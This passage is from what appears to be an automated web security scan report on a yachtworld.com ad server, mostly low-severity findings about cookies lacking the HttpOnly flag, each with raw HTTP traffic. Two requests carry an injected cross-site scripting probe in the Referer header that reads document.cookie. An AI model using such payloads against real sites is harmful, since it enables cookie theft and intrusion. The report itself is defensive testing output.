Path:   /RealMedia/ads/adstream_mjx.ads/www.yachtworld.com/en/opensearchresults.html/1976854735@Top1,Right1

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /RealMedia/ads/adstream_mjx.ads/www.yachtworld.com/en/opensearchresults.html/1976854735@Top1,Right1?&man=regulator&type=used&minyr=2004&minpr=0&minl=24&maxl=32 HTTP/1.1
Host: oasc05139.247realmedia.com
Proxy-Connection: keep-alive
Referer: http://www.yachtworld.com/core/listing/cache/searchResults.jsp
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW8003BLsABpSl; NXCLICK2=011PiBxRNX_TRACK_Abc/Retarget_ABCHomepage_Nonsecure!y!B3!gA!14l; NSC_d17efm_qppm_iuuq=ffffffff09499e3845525d5f4f58455e445a4a423660; RMFS=011PiXQCU30erBjd|U10esfwB

Response

HTTP/1.1 200 OK
Date: Thu, 27 Jan 2011 19:32:14 GMT
Server: Apache/2.0.52 (Red Hat)
Set-Cookie: RMFS=011PiXZmU30erBjd|U10esfwB; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.247realmedia.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 2942
Content-Type: application/x-javascript
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

function OAS_RICH(position) {
if (position == 'Right1') {
document.write ('<A HREF="http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.yachtworld.com/en/opensearchresults.html/L44/110374
...[SNIP]...

4.24. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_mjx.ads/www.yachtworld.com/us33d06/1206775208@Right1,Top1  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/adstream_mjx.ads/www.yachtworld.com/us33d06/1206775208@Right1,Top1

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /RealMedia/ads/adstream_mjx.ads/www.yachtworld.com/us33d06/1206775208@Right1,Top1? HTTP/1.1
Host: oasc05139.247realmedia.com
Proxy-Connection: keep-alive
Referer: http://www.boats.com/boat-transport/index.jsp?source=yachtworld&yw_country=US33d06'%3balert(document.cookie)//ec734b2bd35
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW8003BLsABpSl; NXCLICK2=011PiBxRNX_TRACK_Abc/Retarget_ABCHomepage_Nonsecure!y!B3!gA!14l; NSC_d17efm_qppm_iuuq=ffffffff09499e3845525d5f4f58455e445a4a423660; RMFS=011PiXSrU30erBjd|U10esfwB

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 02:38:48 GMT
Server: Apache/2.0.52 (Red Hat)
Set-Cookie: RMFS=011PieEa; expires=Sat, 01-Jan-2000 23:59:59 GMT; path=/; domain=.247realmedia.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 769
Content-Type: application/x-javascript
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

function OAS_RICH(position) {
if (position == 'Right1') {
document.write ('<A HREF="http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.yachtworld.com/us33d06/662930420/Right1/default/emp
...[SNIP]...

4.25. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_mjx.ads/www.yachtworld.com/us33d06/1452865909@Right1,Top1  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/adstream_mjx.ads/www.yachtworld.com/us33d06/1452865909@Right1,Top1

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_mjx.ads/www.yachtworld.com/us33d06/1452865909@Right1,Top1 HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NXCLICK2=011PiBxRNX_TRACK_Abc/Retarget_ABCHomepage_Nonsecure!y!B3!gA!14l; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl; RMFS=011PiXzx;

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 03:25:10 GMT
Server: Apache/2.0.52 (Red Hat)
Set-Cookie: RMFS=011PiexS; expires=Sat, 01-Jan-2000 23:59:59 GMT; path=/; domain=.247realmedia.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 768
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: application/x-javascript

function OAS_RICH(position) {
if (position == 'Right1') {
document.write ('<A HREF="http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.yachtworld.com/us33d06/711547878/Right1/default/emp
...[SNIP]...

4.26. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_mjx.ads/www.yachtworld.com/us33d06/1452865909@Right1,Top1  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/adstream_mjx.ads/www.yachtworld.com/us33d06/1452865909@Right1,Top1

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_mjx.ads/www.yachtworld.com/us33d06/1452865909@Right1,Top1? HTTP/1.1
Host: oasc05139.247realmedia.com
Proxy-Connection: keep-alive
Referer: http://www.boats.com/boat-transport/index.jsp?source=yachtworld&yw_country=US33d06'%3balert(document.cookie)//ec734b2bd35
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW8003BLsABpSl; NXCLICK2=011PiBxRNX_TRACK_Abc/Retarget_ABCHomepage_Nonsecure!y!B3!gA!14l

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 01:15:34 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 769
Content-Type: application/x-javascript
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

function OAS_RICH(position) {
if (position == 'Right1') {
document.write ('<A HREF="http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.yachtworld.com/us33d06/1205137974/Right1/default/em
...[SNIP]...

4.27. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.yachtworld.com/en/boatsearch.html/L37/198824290/Right1/Boats/galati2-yen-as/galati2-maritimo-sky.gif/7263485738303033424c73414270536c  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.yachtworld.com/en/boatsearch.html/L37/198824290/Right1/Boats/galati2-yen-as/galati2-maritimo-sky.gif/7263485738303033424c73414270536c

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/click_lx.ads/www.yachtworld.com/en/boatsearch.html/L37/198824290/Right1/Boats/galati2-yen-as/galati2-maritimo-sky.gif/7263485738303033424c73414270536c HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NXCLICK2=011PiBxRNX_TRACK_Abc/Retarget_ABCHomepage_Nonsecure!y!B3!gA!14l; NSC_d17efm_qppm_iuuq=ffffffff09499e3845525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl; RMFS=011PiXSrU30erBjd|U10esfwB;

Response

HTTP/1.1 302 Found
Date: Thu, 27 Jan 2011 19:43:34 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://yacht.galatiyachts.com/maritimo-yachts/?utm_source=yachtworld&utm_medium=banner&utm_campaign=maritimo
Content-Length: 393
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://yacht.galatiyachts.com/maritimo-yachts/?
...[SNIP]...

4.28. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.yachtworld.com/en/boatsearch.html/L37/913898925/Top1/Boats/bayliner8-cruiser-yen-as/sr1-bayliner8-cruiser-yen-728.html/7263485738303033424c73414270536c  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.yachtworld.com/en/boatsearch.html/L37/913898925/Top1/Boats/bayliner8-cruiser-yen-as/sr1-bayliner8-cruiser-yen-728.html/7263485738303033424c73414270536c

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/click_lx.ads/www.yachtworld.com/en/boatsearch.html/L37/913898925/Top1/Boats/bayliner8-cruiser-yen-as/sr1-bayliner8-cruiser-yen-728.html/7263485738303033424c73414270536c HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NXCLICK2=011PiBxRNX_TRACK_Abc/Retarget_ABCHomepage_Nonsecure!y!B3!gA!14l; NSC_d17efm_qppm_iuuq=ffffffff09499e3845525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl; RMFS=011PiXSrU30erBjd|U10esfwB;

Response

HTTP/1.1 302 Found
Date: Thu, 27 Jan 2011 19:43:35 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.bayliner.com/_usca/?utm_medium=728x90&utm_campaign=Winter+Sale+&utm_source=YachtWorld&utm_content=Cruiser
Content-Length: 405
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.bayliner.com/_usca/?utm_medium=728x9
...[SNIP]...

4.29. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.yachtworld.com/en/homepage.html/L35/1838745994/Position2/Boats/seabob2-yen-hp300/seabob-yen-video-hp300.html/7263485738303033424c73414270536c  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.yachtworld.com/en/homepage.html/L35/1838745994/Position2/Boats/seabob2-yen-hp300/seabob-yen-video-hp300.html/7263485738303033424c73414270536c

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/click_lx.ads/www.yachtworld.com/en/homepage.html/L35/1838745994/Position2/Boats/seabob2-yen-hp300/seabob-yen-video-hp300.html/7263485738303033424c73414270536c HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NXCLICK2=011PiBxRNX_TRACK_Abc/Retarget_ABCHomepage_Nonsecure!y!B3!gA!14l; NSC_d17efm_qppm_iuuq=ffffffff09499e3845525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl; RMFS=011PiXSrU30erBjd|U10esfwB;

Response

HTTP/1.1 302 Found
Date: Thu, 27 Jan 2011 19:43:24 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.seabob.com/?utm_source=yachtworld&utm_medium=banner&utm_campaign=video
Content-Length: 366
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.seabob.com/?utm_source=yachtworld&am
...[SNIP]...

4.30. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.yachtworld.com/en/homepage.html/L35/284377168/Position2/Boats/bayliner8-cruiser-yen-hp300/hp300-bayliner8-cruiser-yen-hp.html/7263485738303033424c73414270536c  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.yachtworld.com/en/homepage.html/L35/284377168/Position2/Boats/bayliner8-cruiser-yen-hp300/hp300-bayliner8-cruiser-yen-hp.html/7263485738303033424c73414270536c

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/click_lx.ads/www.yachtworld.com/en/homepage.html/L35/284377168/Position2/Boats/bayliner8-cruiser-yen-hp300/hp300-bayliner8-cruiser-yen-hp.html/7263485738303033424c73414270536c HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NXCLICK2=011PiBxRNX_TRACK_Abc/Retarget_ABCHomepage_Nonsecure!y!B3!gA!14l; NSC_d17efm_qppm_iuuq=ffffffff09499e3845525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl; RMFS=011PiXSrU30erBjd|U10esfwB;

Response

HTTP/1.1 302 Found
Date: Thu, 27 Jan 2011 19:43:25 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.bayliner.com/_usca/?utm_medium=300x250&utm_campaign=Winter+Sale+&utm_source=YachtWorld&utm_content=Cruiser
Content-Length: 406
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.bayliner.com/_usca/?utm_medium=300x2
...[SNIP]...

4.31. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.yachtworld.com/en/homepage.html/L35/432546903/Right1/Boats/searay7-yacht-yen-hp/hp-searay7-yacht-yen-sky.html/7263485738303033424c73414270536c  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.yachtworld.com/en/homepage.html/L35/432546903/Right1/Boats/searay7-yacht-yen-hp/hp-searay7-yacht-yen-sky.html/7263485738303033424c73414270536c

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/click_lx.ads/www.yachtworld.com/en/homepage.html/L35/432546903/Right1/Boats/searay7-yacht-yen-hp/hp-searay7-yacht-yen-sky.html/7263485738303033424c73414270536c HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NXCLICK2=011PiBxRNX_TRACK_Abc/Retarget_ABCHomepage_Nonsecure!y!B3!gA!14l; NSC_d17efm_qppm_iuuq=ffffffff09499e3845525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl; RMFS=011PiXSrU30erBjd|U10esfwB;

Response

HTTP/1.1 302 Found
Date: Thu, 27 Jan 2011 19:43:25 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.searay.com/page.aspx/pageid/79502/page.aspx
Content-Length: 331
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.searay.com/page.aspx/pageid/79502/pa
...[SNIP]...

4.32. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.yachtworld.com/en/homepage.html/L35/518339457/Right1/Boats/hmy2-trades-yen-hp/HMYS193-trades-sky.html/7263485738303033424c73414270536c  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.yachtworld.com/en/homepage.html/L35/518339457/Right1/Boats/hmy2-trades-yen-hp/HMYS193-trades-sky.html/7263485738303033424c73414270536c

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/click_lx.ads/www.yachtworld.com/en/homepage.html/L35/518339457/Right1/Boats/hmy2-trades-yen-hp/HMYS193-trades-sky.html/7263485738303033424c73414270536c HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NXCLICK2=011PiBxRNX_TRACK_Abc/Retarget_ABCHomepage_Nonsecure!y!B3!gA!14l; NSC_d17efm_qppm_iuuq=ffffffff09499e3845525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl; RMFS=011PiXSrU30erBjd|U10esfwB;

Response

HTTP/1.1 302 Found
Date: Thu, 27 Jan 2011 19:43:25 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.hmy.com/october-2010-landing-page/
Content-Length: 322
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.hmy.com/october-2010-landing-page/">
...[SNIP]...

4.33. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.yachtworld.com/en/openboatdetails.html/L42/1070264900/Top1/Boats/byh3-yen-bd10/byh3-boatloan-728.JPG/7263485738303033424c73414270536c  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.yachtworld.com/en/openboatdetails.html/L42/1070264900/Top1/Boats/byh3-yen-bd10/byh3-boatloan-728.JPG/7263485738303033424c73414270536c

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /RealMedia/ads/click_lx.ads/www.yachtworld.com/en/openboatdetails.html/L42/1070264900/Top1/Boats/byh3-yen-bd10/byh3-boatloan-728.JPG/7263485738303033424c73414270536c?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NXCLICK2=011PiBxRNX_TRACK_Abc/Retarget_ABCHomepage_Nonsecure!y!B3!gA!14l; NSC_d17efm_qppm_iuuq=ffffffff09499e3845525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl; RMFS=011PiXSrU30erBjd|U10esfwB;

Response

HTTP/1.1 302 Found
Date: Thu, 27 Jan 2011 19:43:31 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Set-Cookie: RMFS=011PiXkhU30erBjd|U10esfwB; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.247realmedia.com
Location: http://www.yachtworld.com/boat-loans/index.jsp?
Content-Length: 324
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.yachtworld.com/boat-loans/index.jsp?
...[SNIP]...

4.34. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.yachtworld.com/en/openboatdetails.html/L42/1166415081/Right1/Boats/byh5dig-yen-bd10/ywm-digital-blue-sky.gif/7263485738303033424c73414270536c  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.yachtworld.com/en/openboatdetails.html/L42/1166415081/Right1/Boats/byh5dig-yen-bd10/ywm-digital-blue-sky.gif/7263485738303033424c73414270536c

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/click_lx.ads/www.yachtworld.com/en/openboatdetails.html/L42/1166415081/Right1/Boats/byh5dig-yen-bd10/ywm-digital-blue-sky.gif/7263485738303033424c73414270536c?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NXCLICK2=011PiBxRNX_TRACK_Abc/Retarget_ABCHomepage_Nonsecure!y!B3!gA!14l; NSC_d17efm_qppm_iuuq=ffffffff09499e3845525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl; RMFS=011PiXSrU30erBjd|U10esfwB;

Response

HTTP/1.1 302 Found
Date: Thu, 27 Jan 2011 19:43:33 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.yachtworldmagazine.com/indigital.htm
Content-Length: 324
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.yachtworldmagazine.com/indigital.htm
...[SNIP]...

4.35. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.yachtworld.com/en/openboatdetails.html/L42/1306972267/Right1/Boats/byh5dig-yen-bd10/ywm-digital-blue-sky.gif/7263485738303033424c73414270536c  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.yachtworld.com/en/openboatdetails.html/L42/1306972267/Right1/Boats/byh5dig-yen-bd10/ywm-digital-blue-sky.gif/7263485738303033424c73414270536c

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/click_lx.ads/www.yachtworld.com/en/openboatdetails.html/L42/1306972267/Right1/Boats/byh5dig-yen-bd10/ywm-digital-blue-sky.gif/7263485738303033424c73414270536c HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NXCLICK2=011PiBxRNX_TRACK_Abc/Retarget_ABCHomepage_Nonsecure!y!B3!gA!14l; NSC_d17efm_qppm_iuuq=ffffffff09499e3845525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl; RMFS=011PiXSrU30erBjd|U10esfwB;

Response

HTTP/1.1 302 Found
Date: Thu, 27 Jan 2011 19:43:30 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.yachtworldmagazine.com/indigital.htm
Content-Length: 324
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.yachtworldmagazine.com/indigital.htm
...[SNIP]...

4.36. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.yachtworld.com/en/openboatdetails.html/L42/1391248166/Top1/Boats/byh3-yen-bd10/byh3-boatloan-728.JPG/7263485738303033424c73414270536c  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.yachtworld.com/en/openboatdetails.html/L42/1391248166/Top1/Boats/byh3-yen-bd10/byh3-boatloan-728.JPG/7263485738303033424c73414270536c

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /RealMedia/ads/click_lx.ads/www.yachtworld.com/en/openboatdetails.html/L42/1391248166/Top1/Boats/byh3-yen-bd10/byh3-boatloan-728.JPG/7263485738303033424c73414270536c HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NXCLICK2=011PiBxRNX_TRACK_Abc/Retarget_ABCHomepage_Nonsecure!y!B3!gA!14l; NSC_d17efm_qppm_iuuq=ffffffff09499e3845525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl; RMFS=011PiXSrU30erBjd|U10esfwB;

Response

HTTP/1.1 302 Found
Date: Thu, 27 Jan 2011 19:43:34 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Set-Cookie: RMFS=011PiXkkU30erBjd|U10esfwB; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.247realmedia.com
Location: http://www.yachtworld.com/boat-loans/index.jsp?
Content-Length: 324
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.yachtworld.com/boat-loans/index.jsp?
...[SNIP]...

4.37. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.yachtworld.com/en/openboatdetails.html/L42/1813621051/Right1/Boats/byh5dig-yen-bd10/ywm-digital-wht-sky.gif/7263485738303033424c73414270536c  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
